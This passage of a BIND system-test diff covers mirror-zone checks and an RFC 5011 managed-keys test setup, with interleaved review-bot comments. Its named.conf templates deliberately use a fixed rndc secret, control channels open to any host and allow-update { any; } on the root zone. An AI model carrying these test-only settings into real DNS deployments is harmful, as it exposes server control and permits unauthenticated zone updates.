SOA > dig.out.ns3.test$n 2>&1 || ret=1 +# Check response code and flags in the answer. +grep "REFUSED" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.* ad" dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that outgoing transfers of mirror zones are disabled by default ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 . AXFR > dig.out.ns3.test$n 2>&1 || ret=1 +grep "; Transfer failed" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that notifies are disabled by default for mirror zones ($n)" +ret=0 +grep "initially-unavailable.*sending notifies" ns3/named.run > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking output of \"rndc zonestatus\" for a mirror zone ($n)" +ret=0 +$RNDCCMD 10.53.0.3 zonestatus . > rndc.out.ns3.test$n 2>&1 +grep "type: mirror" rndc.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that \"rndc reconfig\" properly handles a mirror -> secondary zone type change ($n)" +ret=0 +# Sanity check before we start. +$DIG $DIGOPTS @10.53.0.3 +norec verify-reconfig SOA > dig.out.ns3.test$n.1 2>&1 || ret=1 +grep "NOERROR" dig.out.ns3.test$n.1 > /dev/null || ret=1 +grep "flags:.* aa" dig.out.ns3.test$n.1 > /dev/null && ret=1 +grep "flags:.* ad" dig.out.ns3.test$n.1 > /dev/null || ret=1 +# Reconfigure the zone so that it is no longer a mirror zone. +# (NOTE: Keep the embedded newline in the sed function list below.) 
+sed '/^zone "verify-reconfig" {$/,/^};$/ { + s/type mirror;/type secondary;/ +}' ns3/named.conf > ns3/named.conf.modified +mv ns3/named.conf.modified ns3/named.conf +nextpart ns3/named.run > /dev/null +rndc_reconfig ns3 10.53.0.3 +# Zones whose type was changed should not be reusable, which means the tested +# zone should have been reloaded from disk. +wait_for_load verify-reconfig ${ORIGINAL_SERIAL} ns3/named.run +# Ensure responses sourced from the reconfigured zone have AA=1 and AD=0. +$DIG $DIGOPTS @10.53.0.3 +norec verify-reconfig SOA > dig.out.ns3.test$n.2 2>&1 || ret=1 +grep "NOERROR" dig.out.ns3.test$n.2 > /dev/null || ret=1 +grep "flags:.* aa" dig.out.ns3.test$n.2 > /dev/null || ret=1 +grep "flags:.* ad" dig.out.ns3.test$n.2 > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that \"rndc reconfig\" properly handles a secondary -> mirror zone type change ($n)" +ret=0 +# Put an incorrectly signed version of the zone in the zone file used by ns3. +nextpart ns3/named.run > /dev/null +cat ns2/verify-reconfig.db.bad.signed > ns3/verify-reconfig.db.mirror +# Reconfigure the zone so that it is a mirror zone again. +# (NOTE: Keep the embedded newline in the sed function list below.) +sed '/^zone "verify-reconfig" {$/,/^};$/ { + s/type secondary;/type mirror;/ +}' ns3/named.conf > ns3/named.conf.modified +mv ns3/named.conf.modified ns3/named.conf +rndc_reconfig ns3 10.53.0.3 +# The reconfigured zone should fail verification. 
+wait_for_load verify-reconfig ${UPDATED_SERIAL_BAD} ns3/named.run +$DIG $DIGOPTS @10.53.0.3 +norec verify-reconfig SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "${UPDATED_SERIAL_BAD}.*; serial" dig.out.ns3.test$n > /dev/null && ret=1 +nextpart ns3/named.run | grep "No correct ${DEFAULT_ALGORITHM} signature for verify-reconfig SOA" > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that a mirror zone can be added using rndc ($n)" +ret=0 +# Sanity check: the zone should not exist in the root zone. +$DIG $DIGOPTS @10.53.0.3 +norec verify-addzone SOA > dig.out.ns3.test$n.1 2>&1 || ret=1 +grep "NXDOMAIN" dig.out.ns3.test$n.1 > /dev/null || ret=1 +grep "flags:.* aa" dig.out.ns3.test$n.1 > /dev/null && ret=1 +grep "flags:.* ad" dig.out.ns3.test$n.1 > /dev/null || ret=1 +# Mirror a zone which does not exist in the root zone. +nextpart ns3/named.run > /dev/null +$RNDCCMD 10.53.0.3 addzone verify-addzone '{ type mirror; primaries { 10.53.0.2; }; };' > rndc.out.ns3.test$n 2>&1 || ret=1 +wait_for_transfer verify-addzone +# Check whether the mirror zone was added and whether it behaves as expected. +$DIG $DIGOPTS @10.53.0.3 +norec verify-addzone SOA > dig.out.ns3.test$n.2 2>&1 || ret=1 +grep "NOERROR" dig.out.ns3.test$n.2 > /dev/null || ret=1 +grep "flags:.* aa" dig.out.ns3.test$n.2 > /dev/null && ret=1 +grep "flags:.* ad" dig.out.ns3.test$n.2 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that a mirror zone can be deleted using rndc ($n)" +ret=0 +# Remove the mirror zone added in the previous test. +nextpart ns3/named.run > /dev/null +$RNDCCMD 10.53.0.3 delzone verify-addzone > rndc.out.ns3.test$n 2>&1 || ret=1 +wait_for_log 20 "zone verify-addzone/IN: mirror zone is no longer in use; reverting to normal recursion" ns3/named.run || ret=1 +# Check whether the mirror zone was removed. 
+$DIG $DIGOPTS @10.53.0.3 +norec verify-addzone SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.* aa" dig.out.ns3.test$n > /dev/null && ret=1 +grep "flags:.* ad" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/mkeys/README b/bin/tests/system/mkeys/README new file mode 100644 index 0000000..25637bf --- /dev/null +++ b/bin/tests/system/mkeys/README 
@@ -0,0 +1,34 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +This is for testing RFC 5011 Automated Updates of DNSSEC Trust Anchors. + +ns1 is the root server that offers new KSKs and hosts one record for +testing. The TTL for the zone's records is 2 seconds. + +ns2 is a validator that uses managed keys. "-T mkeytimers=2/20/40" +is used so it will attempt do automated updates frequently. "-T tat=1" +is used so it will send TAT queries once per second. + +ns3 is a validator with a broken initializing key in trust-anchors. + +ns4 is a validator with a deliberately broken managed-keys.bind and +managed-keys.jnl, causing RFC 5011 initialization to fail. + +ns5 is a validator which is prevented from getting a response from the +root server, causing key refresh queries to fail. + +ns6 is a validator which has unsupported algorithms, one at start up, +one because of an algorithm rollover. + +ns7 is a validator with multiple views configured. It is used for +testing per-view rndc commands and checking interactions between options +related to and potentially affecting RFC 5011 processing. diff --git a/bin/tests/system/mkeys/clean.sh b/bin/tests/system/mkeys/clean.sh new file mode 100644 index 0000000..3f297a2 --- /dev/null +++ b/bin/tests/system/mkeys/clean.sh 
@@ -0,0 +1,33 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f */K* */*.signed */trusted.conf */*.jnl */*.bk
+rm -f */island.conf
+rm -f */private.conf
+rm -f */managed*.conf ns1/managed.key ns1/managed.key.id
+rm -f */managed-keys.bind* */named.secroots
+rm -f */named.conf
+rm -f */named.memstats */named.run */named.run.prev
+rm -f dig.out* delv.out* rndc.out* signer.out*
+rm -f dsset-. ns1/dsset-.
+rm -f ns*/managed-keys.bind*
+rm -f ns*/named.lock
+rm -f ns1/dsset-sub.tld.
+rm -f ns1/dsset-tld.
+rm -f ns1/named.secroots ns1/root.db.signed* ns1/root.db.tmp
+rm -f ns1/zone.key
+rm -f ns3/broken.conf
+rm -f ns4/dsset-sub.foo.
+rm -f ns5/named.args
+rm -f ns7/view1.mkeys ns7/view2.mkeys
+rm -rf ns4/nope
diff --git a/bin/tests/system/mkeys/ns1/named1.conf.in b/bin/tests/system/mkeys/ns1/named1.conf.in
new file mode 100644
index 0000000..6ca16e1
--- /dev/null
+++ b/bin/tests/system/mkeys/ns1/named1.conf.in
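Review bot: Nothing in mkeys/clean.sh checks the working directory, yet every deletion uses relative globs such as `*/named.conf`, `*/*.jnl` and `rm -rf ns4/nope`. The test runner presumably changes into the mkeys directory before calling the script, but a run from anywhere else would remove matching files under that directory instead. A guard before the first `rm`, for example `[ -f ns1/sign.sh ] || exit 1`, together with a comment `# Must be run from the mkeys test directory; all paths below are relative to it.`, would make that assumption explicit.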
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS1
+
+acl allowed {
+ ! 10.53.0.5;
+ any;
+};
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify no;
+ dnssec-validation yes;
+ allow-query { allowed; };
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type primary;
+ file "root.db.signed";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "tld" {
+ type primary;
+ file "tld.db.signed";
+};
+
+zone "sub.tld" {
+ type primary;
+ file "sub.tld.db.signed";
+};
diff --git a/bin/tests/system/mkeys/ns1/named2.conf.in b/bin/tests/system/mkeys/ns1/named2.conf.in
new file mode 100644
index 0000000..4bfb436
--- /dev/null
+++ b/bin/tests/system/mkeys/ns1/named2.conf.in
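Review bot: ns1/named1.conf.in hard-codes the rndc secret `1234abcd8765`, opens the control channel with `allow { any; }` and lets the root zone take `allow-update { any; }`, and no comment marks any of this as test-only. That is reasonable only while the server listens on the 10.53.0.x test addresses; copied into a real deployment it would expose rndc behind a published key and accept unauthenticated dynamic updates. I would add a comment above the `key` block, for example `// Test fixture only: fixed rndc key and open ACLs; never use outside the system-test network.` The same fixed key and open `controls` statement repeat in ns1/named2.conf.in, ns1/named3.conf.in and the ns2 to ns5 named.conf.in files of this commit.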
@@ -0,0 +1,57 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +acl allowed { + ! 10.53.0.5; + any; +}; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify no; + dnssec-validation yes; + allow-query { allowed; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; + +zone "tld" { + type primary; + file "tld.db.signed"; +}; + +zone "sub.tld" { + type primary; + file "sub.tld.db.signed"; +}; diff --git a/bin/tests/system/mkeys/ns1/named3.conf.in b/bin/tests/system/mkeys/ns1/named3.conf.in new file mode 100644 index 0000000..aa8709b --- /dev/null +++ b/bin/tests/system/mkeys/ns1/named3.conf.in 
@@ -0,0 +1,51 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify no; + dnssec-validation yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; + +zone "tld" { + type primary; + file "tld.db.signed"; +}; + +zone "sub.tld" { + type primary; + file "sub.tld.db.signed"; +}; diff --git a/bin/tests/system/mkeys/ns1/root.db b/bin/tests/system/mkeys/ns1/root.db new file mode 100644 index 0000000..bc83788 --- /dev/null +++ b/bin/tests/system/mkeys/ns1/root.db @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 20 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 2 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +; no delegation + +example. TXT "This is a test." + +tld. NS ns.tld. +ns.tld. A 10.53.0.1 
diff --git a/bin/tests/system/mkeys/ns1/sign.sh b/bin/tests/system/mkeys/ns1/sign.sh
new file mode 100644
index 0000000..fa57307
--- /dev/null
+++ b/bin/tests/system/mkeys/ns1/sign.sh
@@ -0,0 +1,94 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+zone=sub.tld
+zonefile=sub.tld.db
+
+keyname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -qfk $zone)
+zskkeyname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -q $zone)
+
+$SIGNER -Sg -o $zone $zonefile > /dev/null 2>/dev/null
+keyfile_to_initial_ds $keyname > island.conf
+cp island.conf ../ns5/island.conf
+
+zone=tld
+zonefile=tld.db
+
+keyname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -qfk $zone)
+zskkeyname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -q $zone)
+
+$SIGNER -Sg -o $zone $zonefile > /dev/null 2>/dev/null
+
+zone=.
+zonefile=root.db
+
+keyname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -qfk $zone)
+zskkeyname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -q $zone)
+
+$SIGNER -Sg -o $zone $zonefile > /dev/null 2>/dev/null
+
+# Configure the resolving server with an initializing key.
+keyfile_to_initial_ds $keyname > managed.conf
+cp managed.conf ../ns2/managed.conf
+cp managed.conf ../ns4/managed.conf
+cp managed.conf ../ns5/managed.conf
+
+# Configure broken trust anchor for ns3
+# Rotate each nibble in the digest by -1
+$DSFROMKEY $keyname.key |
+awk '!/^; /{
+ printf "trust-anchors {\n"
+ printf "\t\""$1"\" initial-ds "
+ printf $4 " " $5 " " $6 " \""
+ for (i=7; i<=NF; i++) {
+ # rotate digest
+ digest=$i
+ gsub("0", ":", digest)
+ gsub("1", "0", digest)
+ gsub("2", "1", digest)
+ gsub("3", "2", digest)
+ gsub("4", "3", digest)
+ gsub("5", "4", digest)
+ gsub("6", "5", digest)
+ gsub("7", "6", digest)
+ gsub("8", "7", digest)
+ gsub("9", "8", digest)
+ gsub("A", "9", digest)
+ gsub("B", "A", digest)
+ gsub("C", "B", digest)
+ gsub("D", "C", digest)
+ gsub("E", "D", digest)
+ gsub("F", "E", digest)
+ gsub(":", "F", digest)
+ printf digest
+ }
+ printf "\";\n"
+ printf "};\n"
+ }' > ../ns3/broken.conf
+
+# Configure a static key to be used by delv.
+keyfile_to_static_ds $keyname > trusted.conf
+
+# Prepare an unsupported algorithm key.
+unsupportedkey=Kunknown.+255+00000
+cp unsupported.key "${unsupportedkey}.key"
+
+#
+# Save keyname and keyid for managed key id test.
+#
+echo "$keyname" > managed.key
+echo "$zskkeyname" > zone.key
+keyfile_to_key_id $keyname > managed.key.id
diff --git a/bin/tests/system/mkeys/ns1/sub.tld.db b/bin/tests/system/mkeys/ns1/sub.tld.db
new file mode 100644
index 0000000..35d4361
--- /dev/null
+++ b/bin/tests/system/mkeys/ns1/sub.tld.db
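Review bot: The awk program in ns1/sign.sh that writes ../ns3/broken.conf passes data as the printf format string, in `printf "\t\""$1"\" initial-ds "`, `printf $4 " " $5 " " $6 " \""` and `printf digest`. The fields come from `$DSFROMKEY` output and are presumably a name, numbers and hex digits, so this works today, but any `%` in a field would be read as a conversion and corrupt the generated trust anchor. Fixed formats keep the data inert: `printf "\t\"%s\" initial-ds %s %s %s \"", $1, $4, $5, $6` and `printf "%s", digest`.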
@@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 20 +sub.tld. IN SOA marka.isc.org. ns.sub.tld. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 2 ; minimum + ) +sub.tld. NS ns.sub.tld. +ns.sub.tld. A 10.53.0.1 diff --git a/bin/tests/system/mkeys/ns1/tld.db b/bin/tests/system/mkeys/ns1/tld.db new file mode 100644 index 0000000..5c54e0e --- /dev/null +++ b/bin/tests/system/mkeys/ns1/tld.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 20 +tld. IN SOA marka.isc.org. ns.tld. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 2 ; minimum + ) +tld. NS ns.tld. +ns.tld. A 10.53.0.1 +sub.tld. NS ns.sub.tld. +ns.sub.tld. A 10.53.0.1 diff --git a/bin/tests/system/mkeys/ns1/unsupported.key b/bin/tests/system/mkeys/ns1/unsupported.key new file mode 100644 index 0000000..7435d03 --- /dev/null +++ b/bin/tests/system/mkeys/ns1/unsupported.key 
@@ -0,0 +1 @@ +. IN DNSKEY 257 3 255 BJiXuidPHuGIne8GlCBLG+Oq/FZruQd2s3uBo+SxY16NUP/Vwl8MctMK62KsblDU1gIJAdEMVep2tsOkuSm0bIbJ8NBex+N9rSvzH2YJlDCT9QnNfv4q5RRTcVA3lk9nkmWHo6zcAT33yuS+THOCSznOMCJRq8JGZ6xqMJLv9FucuK6CCe6QBAZ5e98dpyGTWQLu7AERKKFqda9YCk3KQfdzx/HZ4SpQpRLncIXvGm1PIMT8Ar95NB/BsFJGwr5ZTaQtRYOXf2DD7wD3pfMsTJCdZyC0J0EtGBG109I+Oou1cswUfqZLXip/aV3eaBAUqLcZpg8P8vAbrvEq4uMS4OMZeXL6nu0irrdS1Pqmax8RsC+x3fg9EBH3QmHroJZtiU5h+0x4qApp7HE4Z5zFRuxIp9iB diff --git a/bin/tests/system/mkeys/ns2/named.args b/bin/tests/system/mkeys/ns2/named.args new file mode 100644 index 0000000..2f752bd --- /dev/null +++ b/bin/tests/system/mkeys/ns2/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D mkeys-ns2 -X named.lock -g -T maxcachesize=2097152 -T mkeytimers=5/10/20 -T tat=1 diff --git a/bin/tests/system/mkeys/ns2/named.conf.in b/bin/tests/system/mkeys/ns2/named.conf.in new file mode 100644 index 0000000..2f823b8 --- /dev/null +++ b/bin/tests/system/mkeys/ns2/named.conf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + notify no; + dnssec-validation auto; + bindkeys-file "managed.conf"; + servfail-ttl 0; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; 
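Review bot: ns2/named.args passes `-T mkeytimers=5/10/20`, but the README added in this commit says ns2 runs with "-T mkeytimers=2/20/40". Among the argument files shown here only ns5/named2.args uses 2/20/40, so the README's description of ns2 looks stale. I would change the README sentence to quote `-T mkeytimers=5/10/20`, or change the argument here if the README states the intended timing.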
diff --git a/bin/tests/system/mkeys/ns3/named.args b/bin/tests/system/mkeys/ns3/named.args new file mode 100644 index 0000000..2015ee5 --- /dev/null +++ b/bin/tests/system/mkeys/ns3/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D mkeys-ns3 -X named.lock -g -T maxcachesize=2097152 -T mkeytimers=5/10/20 diff --git a/bin/tests/system/mkeys/ns3/named.conf.in b/bin/tests/system/mkeys/ns3/named.conf.in new file mode 100644 index 0000000..d5e483f --- /dev/null +++ b/bin/tests/system/mkeys/ns3/named.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify no; + dnssec-validation yes; + bindkeys-file "managed.conf"; + trust-anchor-telemetry no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "broken.conf"; diff --git a/bin/tests/system/mkeys/ns4/named.conf.in b/bin/tests/system/mkeys/ns4/named.conf.in new file mode 100644 index 0000000..f72c081 --- /dev/null +++ b/bin/tests/system/mkeys/ns4/named.conf.in 
@@ -0,0 +1,48 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS4
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify no;
+ dnssec-validation auto;
+ bindkeys-file "managed.conf";
+ managed-keys-directory "nope";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "sub.foo" {
+ type primary;
+ file "sub.foo.db.signed";
+};
diff --git a/bin/tests/system/mkeys/ns4/sign.sh b/bin/tests/system/mkeys/ns4/sign.sh
new file mode 100644
index 0000000..13d7640
--- /dev/null
+++ b/bin/tests/system/mkeys/ns4/sign.sh
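Review bot: In ns4/named.conf.in, `managed-keys-directory "nope";` carries no comment saying that the odd value is deliberate. The README describes ns4 as the validator whose managed-keys files are deliberately broken so that RFC 5011 initialization fails, and clean.sh removes `ns4/nope`, so this directory is presumably part of that failure setup. A one-line comment above the option, such as `// Deliberate: directory used by the RFC 5011 initialization-failure test; see README`, would keep a later cleanup from "fixing" it.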
@@ -0,0 +1,25 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+zone=sub.foo
+zonefile=sub.foo.db
+
+keyname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -qfk $zone)
+zskkeyname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -q $zone)
+
+$SIGNER -Sg -o $zone $zonefile > /dev/null 2>/dev/null
+keyfile_to_initial_ds $keyname > private.conf
+cp private.conf ../ns5/private.conf
diff --git a/bin/tests/system/mkeys/ns4/sub.foo.db b/bin/tests/system/mkeys/ns4/sub.foo.db
new file mode 100644
index 0000000..7bc3104
--- /dev/null
+++ b/bin/tests/system/mkeys/ns4/sub.foo.db
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 20
+sub.foo. IN SOA marka.isc.org. ns.foo. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 2 ; minimum
+ )
+sub.foo. NS ns.sub.foo.
+ns.sub.foo. A 10.53.0.4
diff --git a/bin/tests/system/mkeys/ns5/foo.db b/bin/tests/system/mkeys/ns5/foo.db
new file mode 100644
index 0000000..092a1c3
--- /dev/null
+++ b/bin/tests/system/mkeys/ns5/foo.db
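Review bot: ns4/sign.sh runs the signer as `$SIGNER -Sg -o $zone $zonefile > /dev/null 2>/dev/null`, so under `#!/bin/sh -e` a signing failure ends the script with no diagnostic at all. Sending the output to a file instead, for example `$SIGNER -Sg -o $zone $zonefile > signer.out.$zone 2>&1`, keeps the run quiet but leaves evidence when key or zone setup fails; clean.sh would then also need to remove `ns*/signer.out*`. The three `$SIGNER` calls in ns1/sign.sh use the same redirection.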
@@ -0,0 +1,23 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 20
+foo. IN SOA marka.isc.org. ns.foo. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 2 ; minimum
+ )
+foo. NS ns.foo.
+ns.foo. A 10.53.0.5
+sub.foo. NS ns.sub.foo.
+ns.sub.foo. A 10.53.0.4
diff --git a/bin/tests/system/mkeys/ns5/named.conf.in b/bin/tests/system/mkeys/ns5/named.conf.in
new file mode 100644
index 0000000..8af1a46
--- /dev/null
+++ b/bin/tests/system/mkeys/ns5/named.conf.in
@@ -0,0 +1,51 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
